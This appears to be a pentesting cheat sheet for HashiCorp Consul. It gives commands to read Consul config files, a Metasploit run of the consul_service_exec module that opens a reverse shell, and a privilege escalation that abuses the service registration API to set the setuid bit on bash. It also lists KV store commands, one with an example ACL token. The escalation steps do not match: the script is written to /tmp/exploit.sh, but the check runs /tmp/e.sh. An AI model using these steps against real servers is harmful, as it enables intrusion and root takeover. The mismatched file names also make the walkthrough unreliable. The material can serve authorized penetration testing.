# HashiCorp Consul Pentesting

An open-source service networking platform developed by HashiCorp. A default port is 8500.

### Interesting Files in Target System <a href="#interesting-files-in-target-system" id="interesting-files-in-target-system"></a>

If we are in the target system, we can investigate the following files:

```shellscript
cat /etc/consul.d/config.json
```

### RCE <a href="#rce" id="rce"></a>

Resource: [Pentester Academy Blog](https://blog.pentesteracademy.com/hashicorp-consul-remote-command-execution-via-services-api-d709f8ac3960)

Using Metasploit, we may be able to execute command and get a reverse shell. Run the following commands in your local machine.

```shellscript
msfconsole
msf> use exploit/multi/misc/consul_service_exec
msf> set rhosts <target-ip>
msf> set lhost <your-ip>
msf> run
# Session created...
msf> shell # Spawn the shell
whoami # Run command in the target system
```

### Privilege Escalation <a href="#privilege-escalation" id="privilege-escalation"></a>

If you have the ACL token (xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxxx), you may be able to privilege escalation.\
First, create a script which changes the permission of ‘bash’.

```shellscript
echo 'chmod +s /usr/bin/bash' > /tmp/exploit.sh
```

Then curl.

```
curl --header "X-Consul-Token: <ACL-TOKEN>" --request PUT -d '{"ID": "test", "Name": "test", "Address": "127.0.0.1", "Port": 80, "check": {"Args": ["/usr/bin/bash", "/tmp/e.sh"], "interval": "10s", "timeout": "1s"}}' http://127.0.0.1:8500/v1/agent/service/register
```

### KV (Key/Value) Store <a href="#kv-keyvalue-store" id="kv-keyvalue-store"></a>

```shellscript
# Put
consul kv put --token <ACL-TOKEN> key value
consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 path/to/store data
```